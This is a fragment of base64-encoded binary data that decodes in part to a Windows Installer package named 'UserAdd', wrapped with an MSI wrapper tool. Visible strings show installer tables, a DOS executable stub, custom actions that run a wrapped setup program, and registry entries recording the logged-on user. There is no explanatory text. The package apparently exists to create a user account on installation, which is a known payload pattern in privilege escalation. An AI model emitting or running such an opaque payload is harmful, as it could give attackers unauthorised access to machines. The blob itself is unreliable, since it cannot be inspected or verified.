AAAQAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAgAAAAAAAAAAAAQAAgAAAAIAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/P//fwAAAAAAAAAA/P//fwAAAAAAAAAAAAAAAAEAAIAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////fwAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAACA/////wAAAAAAAAAA/////wAAAAAAAAAAAAAAAAAAAAD/fwCAAAAAAAAAAAD/fwCAAAAAAAAAAAD/fwCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/fwCAAAAAAAAAAAAAAAAA/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP9/AID/fwCAAAAAAAAAAAD//////38AgAAAAAAAAAAAAAAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/fwCAAAAAAAAAAAD/fwCAAAAAAAAAAAAAAAAA/38AgP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAACAAAAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANQAAADsAAAA1AAAAAAAAAAAAAAAAAAAANQAAAAAATQAAAAAAAABNAC8AAAAAAC8AAAAAAAAAYQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAABgAAAAYAAAAAAAAAAAAAAAAAAAAGAAAAAAAGAAAAAAAAAAYABgAAAAAABgAAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAA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IACQAFADoAAQAMAAIAVwABAIYAAQAQAAIApgABAAoAAwApAAEABwAVADkAAQAOAAIAlAABAAUAAgAuAAEAOgABAAcAAgA+AAEABQACAIEAAQAJAAIAawABAFEAAQASAAEAEQAFAAgAAgAfAAEACgAGACEAAQAEABQAcwABADkAAQAIAAIACAABAGMAAQAIAAIAJQABAAcAAwBBAAEACAAGAD8AAQB2AAEASgABAAQABQBOYW1lVGFibGVUeXBlQ29sdW1uX1ZhbGlkYXRpb25WYWx1ZU5Qcm9wZXJ0eUlkX1N1bW1hcnlJbmZvcm1hdGlvbkRlc2NyaXB0aW9uU2V0Q2F0ZWdvcnlLZXlDb2x1bW5NYXhWYWx1ZU51bGxhYmxlS2V5VGFibGVNaW5WYWx1ZUlkZW50aWZpZXJOYW1lIG9mIHRhYmxlTmFtZSBvZiBjb2x1bW5ZO05XaGV0aGVyIHRoZSBjb2x1bW4gaXMgbnVsbGFibGVZTWluaW11bSB2YWx1ZSBhbGxvd2VkTWF4aW11bSB2YWx1ZSBhbGxvd2VkRm9yIGZvcmVpZ24ga2V5LCBOYW1lIG9mIHRhYmxlIHRvIHdoaWNoIGRhdGEgbXVzdCBsaW5rQ29sdW1uIHRvIHdoaWNoIGZvcmVpZ24ga2V5IGNvbm5lY3RzVGV4dDtGb3JtYXR0ZWQ7VGVtcGxhdGU7Q29uZGl0aW9uO0d1aWQ7UGF0aDtWZXJzaW9uO0xhbmd1YWdlO0lkZW50aWZpZXI7QmluYXJ5O1VwcGVyQ2FzZTtMb3dlckNhc2U7RmlsZW5hbWU7UGF0aHM7QW55UGF0aDtXaWxkQ2FyZEZpbGVuYW1lO1JlZ1BhdGg7Q3VzdG9tU291cmNlO1Byb3BlcnR5O0NhYmluZXQ7U2hvcnRjdXQ7Rm9ybWF0dGVkU0RETFRleHQ7SW50ZWdlcjtEb3VibGVJbnRlZ2VyO1RpbWVEYXRlO0RlZmF1bHREaXJTdHJpbmcgY2F0ZWdvcnlUZXh0U2V0IG9mIHZhbHVlcyB0aGF0IGFyZSBwZXJtaXR0ZWREZXNjcmlwdGlvbiBvZiBjb2x1bW5BZG1pbkV4ZWN1dGVTZXF1ZW5jZUFjdGlvbk5hbWUgb2YgYWN0aW9uIHRvIGludm9rZSwgZWl0aGVyIGluIHRoZSBlbmdpbmUgb3IgdGhlIGhhbmRsZXIgRExMLkNvbmRpdGlvbk9wdGlvbmFsIGV4cHJlc3Npb24gd2hpY2ggc2tpcHMgdGhlIGFjdGlvbiBpZiBldmFsdWF0ZXMgdG8gZXhwRmFsc2UuSWYgdGhlIGV4cHJlc3Npb24gc3ludGF4IGlzIGludmFsaWQsIHRoZSBlbmdpbmUgd2lsbCB0ZXJtaW5hdGUsIHJldHVybmluZyBpZXNCYWRBY3Rpb25EYXRhLlNlcXVlbmNlTnVtYmVyIHRoYXQgZGV0ZXJtaW5lcyB0aGUgc29ydCBvcmRlciBpbiB3aGljaCB0aGUgYWN0aW9ucyBhcmUgdG8gYmUgZXhlY3V0ZWQuICBMZWF2ZSBibGFuayB0byBzdXBwcmVzcyBhY3Rpb24uQWRtaW5VSVNlcXVlbmNlQWR2dEV4ZWN1dGVTZXF1ZW5jZUJpbmFyeVVuaXF1ZSBrZXkgaWRlbnRpZnlpbmcgdGhlIGJpbmFyeSBkYXRhLkRhdGFUaGUgdW5mb3JtYXR0ZWQgYmluYXJ5IGRhdGEuQ29tcG9uZW50UHJpbWFyeSBrZXkgdXNlZCB0byBpZGVudGlmeSBhIHBhcnRpY3VsYXIgY29tcG9uZW50IHJlY29yZC5Db21wb25lbnRJZEd1aWRBIHN0cmluZyBHVUlEIHVuaXF1ZSB0byB0aGlzIGNvbXBvbmVudCwgdmVyc2lvbiwgYW5kIGxhbmd1YWdlLkRpcmVjdG9yeV9EaXJlY3RvcnlSZXF1aXJlZCBrZXkgb2YgYSBEaXJlY3RvcnkgdGFibGUgcmVjb3JkLiBUaGlzIGlzIGFjdHVhbGx5IGEgcHJvcGVydHkgbmFtZSB3aG9zZSB2YWx1ZSBjb250YWlucyB0aGUgYWN0dWFsIHBhdGgsIHNldCBlaXRoZXIgYnkgdGhlIEFwcFNlYXJjaCBhY3Rpb24gb3Igd2l0aCB0aGUgZGVmYXVsdCBzZXR0aW5nIG9idGFpbmVkIGZyb20gdGhlIERpcmVjdG9yeSB0YWJsZS5BdHRyaWJ1dGVzUmVtb3RlIGV4ZWN1dGlvbiBvcHRpb24sIG9uZSBvZiBpcnNFbnVtQSBjb25kaXRpb25hbCBzdGF0ZW1lbnQgdGhhdCB3aWxsIGRpc2FibGUgdGhpcyBjb21wb25lbnQgaWYgdGhlIHNwZWNpZmllZCBjb25kaXRpb24gZXZhbHVhdGVzIHRvIHRoZSAnVHJ1ZScgc3RhdGUuIElmIGEgY29tcG9uZW50IGlzIGRpc2FibGVkLCBpdCB3aWxsIG5vdCBiZSBpbnN0YWxsZWQsIHJlZ2FyZGxlc3Mgb2YgdGhlICdBY3Rpb24nIHN0YXRlIGFzc29jaWF0ZWQgd2l0aCB0aGUgY29tcG9uZW50LktleVBhdGhGaWxlO1JlZ2lzdHJ5O09EQkNEYXRhU291cmNlRWl0aGVyIHRoZSBwcmltYXJ5IGtleSBpbnRvIHRoZSBGaWxlIHRhYmxlLCBSZWdpc3RyeSB0YWJsZSwgb3IgT0RCQ0RhdGFTb3VyY2UgdGFibGUuIFRoaXMgZXh0cmFjdCBwYXRoIGlzIHN0b3JlZCB3aGVuIHRoZSBjb21wb25lbnQgaXMgaW5zdGFsbGVkLCBhbmQgaXMgdXNlZCB0byBkZXRlY3QgdGhlIHByZXNlbmNlIG9mIHRoZSBjb21wb25lbnQgYW5kIHRvIHJldHVybiB0aGUgcGF0aCB0byBpdC5DdXN0b21BY3Rpb25QcmltYXJ5IGtleSwgbmFtZSBvZiBhY3Rpb24sIG5vcm1hbGx5IGFwcGVhcnMgaW4gc2VxdWVuY2UgdGFibGUgdW5sZXNzIHByaXZhdGUgdXNlLlRoZSBudW1lcmljIGN1c3RvbSBhY3Rpb24gdHlwZSwgY29uc2lzdGluZyBvZiBzb3VyY2UgbG9jYXRpb24sIGNvZGUgdHlwZSwgZW50cnksIG9wdGlvbiBmbGFncy5Tb3VyY2VDdXN0b21Tb3VyY2VUaGUgdGFibGUgcmVmZXJlbmNlIG9mIHRoZSBzb3VyY2Ugb2YgdGhlIGNvZGUuVGFyZ2V0Rm9ybWF0dGVkRXhjZWN1dGlvbiBwYXJhbWV0ZXIsIGRlcGVuZHMgb24gdGhlIHR5cGUgb2YgY3VzdG9tIGFjdGlvbkV4dGVuZGVkVHlwZUEgbnVtZXJpYyBjdXN0b20gYWN0aW9uIHR5cGUgdGhhdCBleHRlbmRzIGNvZGUgdHlwZSBvciBvcHRpb24gZmxhZ3Mgb2YgdGhlIFR5cGUgY29sdW1uLlVuaXF1ZSBpZGVudGlmaWVyIGZvciBkaXJlY3RvcnkgZW50cnksIHByaW1hcnkga2V5LiBJZiBhIHByb3BlcnR5IGJ5IHRoaXMgbmFtZSBpcyBkZWZpbmVkLCBpdCBjb250YWlucyB0aGUgZnVsbCBwYXRoIHRvIHRoZSBkaXJlY3RvcnkuRGlyZWN0b3J5X1BhcmVudFJlZmVyZW5jZSB0byB0aGUgZW50cnkgaW4gdGhpcyB0YWJsZSBzcGVjaWZ5aW5nIHRoZSBkZWZhdWx0IHBhcmVudCBkaXJlY3RvcnkuIEEgcmVjb3JkIHBhcmVudGVkIHRvIGl0c2VsZiBvciB3aXRoIGEgTnVsbCBwYXJlbnQgcmVwcmVzZW50cyBhIHJvb3Qgb2YgdGhlIGluc3RhbGwgdHJlZS5EZWZhdWx0RGlyVGhlIGRlZmF1bHQgc3ViLXBhdGggdW5kZXIgcGFyZW50J3MgcGF0aC5GZWF0dXJlUHJpbWFyeSBrZXkgdXNlZCB0byBpZGVudGlmeSBhIHBhcnRpY3VsYXIgZmVhdHVyZSByZWNvcmQuRmVhdHVyZV9QYXJlbnRPcHRpb25hbCBrZXkgb2YgYSBwYXJlbnQgcmVjb3JkIGluIHRoZSBzYW1lIHRhYmxlLiBJZiB0aGUgcGFyZW50IGlzIG5vdCBzZWxlY3RlZCwgdGhlbiB0aGUgcmVjb3JkIHdpbGwgbm90IGJlIGluc3RhbGxlZC4gTnVsbCBpbmRpY2F0ZXMgYSByb290IGl0ZW0uVGl0bGVTaG9ydCB0ZXh0IGlkZW50aWZ5aW5nIGEgdmlzaWJsZSBmZWF0dXJlIGl0ZW0uTG9uZ2VyIGRlc2NyaXB0aXZlIHRleHQgZGVzY3JpYmluZyBhIHZpc2libGUgZmVhdHVyZSBpdGVtLkRpc3BsYXlOdW1lcmljIHNvcnQgb3JkZXIsIHVzZWQgdG8gZm9yY2UgYSBzcGVjaWZpYyBkaXNwbGF5IG9yZGVyaW5nLkxldmVsVGhlIGluc3RhbGwgbGV2ZWwgYXQgd2hpY2ggcmVjb3JkIHdpbGwgYmUgaW5pdGlhbGx5IHNlbGVjdGVkLiBBbiBpbnN0YWxsIGxldmVsIG9mIDAgd2lsbCBkaXNhYmxlIGFuIGl0ZW0gYW5kIHByZXZlbnQgaXRzIGRpc3BsYXkuVXBwZXJDYXNlVGhlIG5hbWUgb2YgdGhlIERpcmVjdG9yeSB0aGF0IGNhbiBiZSBjb25maWd1cmVkIGJ5IHRoZSBVSS4gQSBub24tbnVsbCB2YWx1ZSB3aWxsIGVuYWJsZSB0aGUgYnJvd3NlIGJ1dHRvbi4wOzE7Mjs0OzU7Njs4Ozk7MTA7MTY7MTc7MTg7MjA7MjE7MjI7MjQ7MjU7MjY7MzI7MzM7MzQ7MzY7Mzc7Mzg7NDg7NDk7NTA7NTI7NTM7NTRGZWF0dXJlIGF0dHJpYnV0ZXNGZWF0dXJlQ29tcG9uZW50c0ZlYXR1cmVfRm9yZWlnbiBrZXkgaW50byBGZWF0dXJlIHRhYmxlLkNvbXBvbmVudF9Gb3JlaWduIGtleSBpbnRvIENvbXBvbmVudCB0YWJsZS5GaWxlUHJpbWFyeSBrZXksIG5vbi1sb2NhbGl6ZWQgdG9rZW4sIG11c3QgbWF0Y2ggaWRlbnRpZmllciBpbiBjYWJpbmV0LiAgRm9yIHVuY29tcHJlc3NlZCBmaWxlcywgdGhpcyBmaWVsZCBpcyBpZ25vcmVkLkZvcmVpZ24ga2V5IHJlZmVyZW5jaW5nIENvbXBvbmVudCB0aGF0IGNvbnRyb2xzIHRoZSBmaWxlLkZpbGVOYW1lRmlsZW5hbWVGaWxlIG5hbWUgdXNlZCBmb3IgaW5zdGFsbGF0aW9uLCBtYXkgYmUgbG9jYWxpemVkLiAgVGhpcyBtYXkgY29udGFpbiBhICJzaG9ydCBuYW1lfGxvbmcgbmFtZSIgcGFpci5GaWxlU2l6ZVNpemUgb2YgZmlsZSBpbiBieXRlcyAobG9uZyBpbnRlZ2VyKS5WZXJzaW9uVmVyc2lvbiBzdHJpbmcgZm9yIHZlcnNpb25lZCBmaWxlczsgIEJsYW5rIGZvciB1bnZlcnNpb25lZCBmaWxlcy5MYW5ndWFnZUxpc3Qgb2YgZGVjaW1hbCBsYW5ndWFnZSBJZHMsIGNvbW1hLXNlcGFyYXRlZCBpZiBtb3JlIHRoYW4gb25lLkludGVnZXIgY29udGFpbmluZyBiaXQgZmxhZ3MgcmVwcmVzZW50aW5nIGZpbGUgYXR0cmlidXRlcyAod2l0aCB0aGUgZGVjaW1hbCB2YWx1ZSBvZiBlYWNoIGJpdCBwb3NpdGlvbiBpbiBwYXJlbnRoZXNlcylTZXF1ZW5jZSB3aXRoIHJlc3BlY3QgdG8gdGhlIG1lZGlhIGltYWdlczsgb3JkZXIgbXVzdCB0cmFjayBjYWJpbmV0IG9yZGVyLkljb25QcmltYXJ5IGtleS4gTmFtZSBvZiB0aGUgaWNvbiBmaWxlLkJpbmFyeSBzdHJlYW0uIFRoZSBiaW5hcnkgaWNvbiBkYXRhIGluIFBFICguRExMIG9yIC5FWEUpIG9yIGljb24gKC5JQ08pIGZvcm1hdC5JbnN0YWxsRXhlY3V0ZVNlcXVlbmNlSW5zdGFsbFVJU2VxdWVuY2VMYXVuY2hDb25kaXRpb25FeHByZXNzaW9uIHdoaWNoIG11c3QgZXZhbHVhdGUgdG8gVFJVRSBpbiBvcmRlciBmb3IgaW5zdGFsbCB0byBjb21tZW5jZS5Mb2NhbGl6YWJsZSB0ZXh0IHRvIGRpc3BsYXkgd2hlbiBjb25kaXRpb24gZmFpbHMgYW5kIGluc3RhbGwgbXVzdCBhYm9ydC5NZWRpYURpc2tJZFByaW1hcnkga2V5LCBpbnRlZ2VyIHRvIGRldGVybWluZSBzb3J0IG9yZGVyIGZvciB0YWJsZS5MYXN0U2VxdWVuY2VGaWxlIHNlcXVlbmNlIG51bWJlciBmb3IgdGhlIGxhc3QgZmlsZSBmb3IgdGhpcyBtZWRpYS5EaXNrUHJvbXB0RGlzayBuYW1lOiB0aGUgdmlzaWJsZSB0ZXh0IGFjdHVhbGx5IHByaW50ZWQgb24gdGhlIGRpc2suICBUaGlzIHdpbGwgYmUgdXNlZCB0byBwcm9tcHQgdGhlIHVzZXIgd2hlbiB0aGlzIGRpc2sgbmVlZHMgdG8gYmUgaW5zZXJ0ZWQuQ2FiaW5ldElmIHNvbWUgb3IgYWxsIG9mIHRoZSBmaWxlcyBzdG9yZWQgb24gdGhlIG1lZGlhIGFyZSBjb21wcmVzc2VkIGluIGEgY2FiaW5ldCwgdGhlIG5hbWUgb2YgdGhhdCBjYWJpbmV0LlZvbHVtZUxhYmVsVGhlIGxhYmVsIGF0dHJpYnV0ZWQgdG8gdGhlIHZvbHVtZS5Qcm9wZXJ0eVRoZSBwcm9wZXJ0eSBkZWZpbmluZyB0aGUgbG9jYXRpb24gb2YgdGhlIGNhYmluZXQgZmlsZS5OYW1lIG9mIHByb3BlcnR5LCB1cHBlcmNhc2UgaWYgc2V0dGFibGUgYnkgbGF1bmNoZXIgb3IgbG9hZGVyLlN0cmluZyB2YWx1ZSBmb3IgcHJvcGVydHkuICBOZXZlciBudWxsIG9yIGVtcHR5LlJlZ2lzdHJ5UHJpbWFyeSBrZXksIG5vbi1sb2NhbGl6ZWQgdG9rZW4uUm9vdFRoZSBwcmVkZWZpbmVkIHJvb3Qga2V5IGZvciB0aGUgcmVnaXN0cnkgdmFsdWUsIG9uZSBvZiBycmtFbnVtLktleVJlZ1BhdGhUaGUga2V5IGZvciB0aGUgcmVnaXN0cnkgdmFsdWUuVGhlIHJlZ2lzdHJ5IHZhbHVlIG5hbWUuVGhlIHJlZ2lzdHJ5IHZhbHVlLkZvcmVpZ24ga2V5IGludG8gdGhlIENvbXBvbmVudCB0YWJsZSByZWZlcmVuY2luZyBjb21wb25lbnQgdGhhdCBjb250cm9scyB0aGUgaW5zdGFsbGluZyBvZiB0aGUgcmVnaXN0cnkgdmFsdWUuVXBncmFkZVVwZ3JhZGVDb2RlVGhlIFVwZ3JhZGVDb2RlIEdVSUQgYmVsb25naW5nIHRvIHRoZSBwcm9kdWN0cyBpbiB0aGlzIHNldC5WZXJzaW9uTWluVGhlIG1pbmltdW0gUHJvZHVjdFZlcnNpb24gb2YgdGhlIHByb2R1Y3RzIGluIHRoaXMgc2V0LiAgVGhlIHNldCBtYXkgb3IgbWF5IG5vdCBpbmNsdWRlIHByb2R1Y3RzIHdpdGggdGhpcyBwYXJ0aWN1bGFyIHZlcnNpb24uVmVyc2lvbk1heFRoZSBtYXhpbXVtIFByb2R1Y3RWZXJzaW9uIG9mIHRoZSBwcm9kdWN0cyBpbiB0aGlzIHNldC4gIFRoZSBzZXQgbWF5IG9yIG1heSBub3QgaW5jbHVkZSBwcm9kdWN0cyB3aXRoIHRoaXMgcGFydGljdWxhciB2ZXJzaW9uLkEgY29tbWEtc2VwYXJhdGVkIGxpc3Qgb2YgbGFuZ3VhZ2VzIGZvciBlaXRoZXIgcHJvZHVjdHMgaW4gdGhpcyBzZXQgb3IgcHJvZHVjdHMgbm90IGluIHRoaXMgc2V0LlRoZSBhdHRyaWJ1dGVzIG9mIHRoaXMgcHJvZHVjdCBzZXQuUmVtb3ZlVGhlIGxpc3Qgb2YgZmVhdHVyZXMgdG8gcmVtb3ZlIHdoZW4gdW5pbnN0YWxsaW5nIGEgcHJvZHVjdCBmcm9tIHRoaXMgc2V0LiAgVGhlIGRlZmF1bHQgaXMgIkFMTCIuQWN0aW9uUHJvcGVydHlUaGUgcHJvcGVydHkgdG8gc2V0IHdoZW4gYSBwcm9kdWN0IGluIHRoaXMgc2V0IGlzIGZvdW5kLkNvc3RJbml0aWFsaXplRmlsZUNvc3RDb3N0RmluYWxpemVJbnN0YWxsVmFsaWRhdGVJbnN0YWxsSW5pdGlhbGl6ZUluc3RhbGxBZG1pblBhY2thZ2VJbnN0YWxsRmlsZXNJbnN0YWxsRmluYWxpemVFeGVjdXRlQWN0aW9uUHVibGlzaEZlYXR1cmVzUHVibGlzaFByb2R1Y3Riei5XcmFwcGVkU2V0dXBQcm9ncmFtYnouQ3VzdG9tQWN0aW9uRGxsYnouUHJvZHVjdENvbXBvbmVudHtFREUxMEY2Qy0zMEY0LTQyQ0EtQjVDNy1BREI5MDVFNDVCRkN9QlouSU5TVEFMTEZPTERFUnJlZzlDQUU1N0FGN0I5RkI0RUYyNzA2Rjk1QjRCODNCNDE5U2V0UHJvcGVydHlGb3JEZWZlcnJlZGJ6Lk1vZGlmeVJlZ2lzdHJ5W0JaLldSQVBQRURfQVBQSURdYnouU3Vic3RXcmFwcGVkQXJndW1lbnRzX1N1YnN0V3JhcHBlZEFyZ3VtZW50c0A0YnouUnVuV3JhcHBlZFNldHVwW2J6LlNldHVwU2l6ZV0gIltTb3VyY2VEaXJdXC4iIFtCWi5JTlNUQUxMX1NVQ0NFU1NfQ09ERVNdICpbQlouRklYRURfSU5TVEFMTF9BUkdVTUVOVFNdW1dSQVBQRURfQVJHVU1FTlRTXV9Nb2RpZnlSZWdpc3RyeUA0YnouVW5pbnN0YWxsV3JhcHBlZF9Vbmluc3RhbGxXcmFwcGVkQDRQcm9ncmFtRmlsZXNGb2xkZXJieGp2aWx3N3xbQlouQ09NUEFOWU5BTUVdVEFSR0VURElSLlNvdXJjZURpclByb2R1Y3RGZWF0dXJlTWFpbiBGZWF0dXJlRmluZFJlbGF0ZWRQcm9kdWN0c0xhdW5jaENvbmRpdGlvbnNWYWxpZGF0ZVByb2R1Y3RJRE1pZ3JhdGVGZWF0dXJlU3RhdGVzUHJvY2Vzc0NvbXBvbmVudHNVbnB1Ymxpc2hGZWF0dXJlc1JlbW92ZVJlZ2lzdHJ5VmFsdWVzV3JpdGVSZWdpc3RyeVZhbHVlc1JlZ2lzdGVyVXNlclJlZ2lzdGVyUHJvZHVjdFJlbW92ZUV4aXN0aW5nUHJvZHVjdHNOT1QgUkVNT1ZFIH49IkFMTCIgQU5EIE5PVCBVUEdSQURFUFJPRFVDVENPREVSRU1PVkUgfj0gIkFMTCIgQU5EIE5PVCBVUEdSQURJTkdQUk9EVUNUQ09ERU5PVCBXSVhfRE9XTkdSQURFX0RFVEVDVEVERG93bmdyYWRlcyBhcmUgbm90IGFsbG93ZWQuQUxMVVNFUlMxQVJQTk9SRVBBSVJBUlBOT01PRElGWUJaLlZFUkZCWi5DT01QQU5ZTkFNRUVYRU1TSS5DT01CWi5JTlNUQUxMX1NVQ0NFU1NfQ09ERVMwQlouVUlOT05FX0lOU1RBTExfQVJHVU1FTlRTIEJaLlVJQkFTSUNfSU5TVEFMTF9BUkdVTUVOVFNCWi5VSVJFRFVDRURfSU5TVEFMTF9BUkdVTUVOVFNCWi5VSUZVTExfSU5TVEFMTF9BUkdVTUVOVFNCWi5VSU5PTkVfVU5JTlNUQUxMX0FSR1VNRU5UU0JaLlVJQkFTSUNfVU5JTlNUQUxMX0FSR1VNRU5UU0JaLlVJUkVEVUNFRF9VTklOU1RBTExfQVJHVU1FTlRTQlouVUlGVUxMX1VOSU5TVEFMTF9BUkdVTUVOVFNiei5TZXR1cFNpemU5NzI4TWFudWZhY3R1cmVyUHJvZHVjdENvZGV7RDgyQUY2ODAtN0FDQS00QTQ4LUFFNTgtQUNCOEVFNDAwRDQyfVByb2R1Y3RMYW5ndWFnZTEwMzNQcm9kdWN0TmFtZVVzZXJBZGQgKFdyYXBwZWQgdXNpbmcgTVNJIFdyYXBwZXIgZnJvbSB3d3cuZXhlbXNpLmNvbSlQcm9kdWN0VmVyc2lvbjEuMC4wLjBXSVhfVVBHUkFERV9ERVRFQ1RFRFNlY3VyZUN1c3RvbVByb3BlcnRpZXNXSVhfRE9XTkdSQURFX0RFVEVDVEVEO1dJWF9VUEdSQURFX0RFVEVDVEVEU09GVFdBUkVcW0JaLkNPTVBBTllOQU1FXVxNU0kgV3JhcHBlclxJbnN0YWxsZWRcW0JaLldSQVBQRURfQVBQSURdTG9nb25Vc2VyW0xvZ29uVXNlcl1yZWcwNDkzNzZERTM1MTY0MjY2QTZGM0FDNDYxQjgxM0ZBNVVTRVJOQU1FW1VTRVJOQU1FXXJlZ0FGODhFMTMzNjZBMTc5QzRFQkZGNzYzRUVBM0RBMjA3RGF0ZVtEYXRlXXJlZzlCRjBGQzAxQUMxQTNBRDEzQTkzMEIwNjYyRTQyMzM0VGltZVtUaW1lXXJlZzRERDA4NzdDNjREN0ZGOTk1OUI0OEJDNUIwOTg1RURFV1JBUFBFRF9BUkdVTUVOVFNbV1JBUFBFRF9BUkdVTUVOVFNdV0lYX0RPV05HUkFERV9ERVRFQ1RFRFBvd2VyVXB7MTk5MWRmYWEtNWM1Mi00YTRiLWIyYWMtNmNkN2I2ZDk4ZTkxfYPEFDhd9HQHi0Xwg2Bw/TPA6aQBAAA5XRR0DIN9FAJ8yoN9FCR/xFYPtzeJXfyDxwLrBQ+3N0dHjUXoUGoIVuhHWAAAg8QMhcB16GaD/i11BoNNGALrBmaD/it1BQ+3N0dHOV0UdTNW6ENWAABZhcB0CcdFFAoAAADrRg+3B2aD+Hh0D2aD+Fh0CcdFFAgAAADrLsdFFBAAAACDfRQQdSFW6ApWAABZhcB1Fg+3B2aD+Hh0BmaD+Fh1B0dHD7c3R0eDyP8z0vd1FIlV+IvYVujcVQAAWYP4/3UpakFYZjvGdwZmg/5adgmNRp9mg/gZdzGNRp9mg/gZD7fGdwOD6CCDwMk7RRRzGoNNGAg5XfxyKXUFO0X4diKDTRgEg30QAHUki0UYT0+oCHUig30QAHQDi30Mg2X8AOtdi038D69NFAPIiU38D7c3R0frgb7///9/qAR1G6gBdT2D4AJ0CYF9/AAAAIB3CYXAdSs5dfx2Juj4+f//9kUYAccAIgAAAHQGg038/+sP9kUYAmoAWA+VwAPGiUX8i0UQXoXAdAKJOPZFGAJ0A/dd/IB99AB0B4tF8INgcP2LRfxfW8nDi/9Vi+wzwFD/dRD/dQz/dQg5BcQoQQB1B2gwHEEA6wFQ6OD9//+DxBRdw7iAEUEAw6H